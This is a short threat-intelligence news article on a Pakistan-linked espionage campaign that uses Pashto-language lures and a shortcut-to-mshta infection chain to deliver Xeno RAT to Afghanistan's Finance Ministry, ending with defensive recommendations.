Pakistan-Linked SideCopy Targets Afghanistan Finance Ministry with Xeno RAT

The emergence of SideCopy’s Operation XENOFISCAL reflects a shifting cyber‑espionage playbook in South Asia, where threat groups increasingly tailor lures to local languages and bureaucratic structures. By aligning the malicious payload with Pashto terminology, the actors demonstrate deep reconnaissance of Afghan governmental workflows, a tactic previously observed in attacks against Indian defense procurement channels. This cultural tailoring raises the bar for detection, as conventional signature‑based filters often miss such context‑specific artifacts.

Technically, the campaign combines classic Windows shortcut abuse with modern persistence tricks. The LNK file invokes mshta.exe to fetch an HTA from a compromised education domain, executing obfuscated JavaScript that drops Xeno RAT 1.8.7 via a DLL loader. The RAT establishes TCP command‑and‑control, supports SOCKS5 tunneling, and mimics Microsoft Edge in the registry to survive reboots. Its capabilities—keylogging, screenshot capture, webcam access, and self‑deletion—equip operators to exfiltrate financial records, personnel data, and strategic policy documents.

For Afghan ministries and neighboring governments, the incident signals an urgent need to reinforce email hygiene, enforce multi‑factor authentication, and segment critical networks. Threat intelligence sharing across the region can help identify similar lures before they reach end users. As Transparent Tribe expands its focus beyond India, stakeholders must adopt behavior‑based detection and regular red‑team exercises to anticipate culturally engineered attacks, thereby reducing the risk of sensitive fiscal information falling into hostile hands.